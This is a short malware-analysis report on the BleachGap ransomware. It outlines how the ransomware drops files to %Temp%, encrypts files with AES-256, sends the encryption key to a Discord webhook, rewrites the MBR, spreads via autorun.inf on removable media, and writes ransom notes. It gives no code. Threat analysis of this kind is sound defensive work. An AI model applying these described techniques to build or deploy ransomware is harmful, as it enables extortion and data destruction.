The researchers captured a ransomware with removable media spreading function named BleachGap. The ransomware first appeared in February 2021 and has been iterated in multiple versions.
BleachGap ransomware has multiple functions such as adding auto-start, adding scheduled tasks, rewriting MBR, invalidating keyboard keys, and disseminating through removable media. It uses “AES-256” symmetric encryption algorithm to encrypt files, and when the key is known Can be decrypted quickly. At present, the function of ransomware is not limited to encrypting files, and it has begun to try to spread laterally through removable media.
After the BleachGap ransomware runs, it releases three files, including “four-digit random character name.bat”, “aescrypt.exe”, and “DiscordSendWebhook.exe” to the %Temp% path.
(1) The bat script file uses a custom algorithm to randomly generate a key, and calls “aescrypt.exe” to encrypt the file;
(2) Call “DiscordSendWebhook.exe” to send user name, encryption key and other information to Discord server;
(3) Download “gameover.exe” and rename it to “final.exe”, rewrite the MBR after running;
(3) Create the “autorun.inf” file in the root directory of the disk to realize the self-starting of the batch script;
(5) Create and execute “p2d.bat”.
“P2d.bat” creates 100 blackmail letters named “Pay2Decrypt(1-100).txt” on the desktop.
The malicious code rewrites the MBR and locks the computer when it is turned on: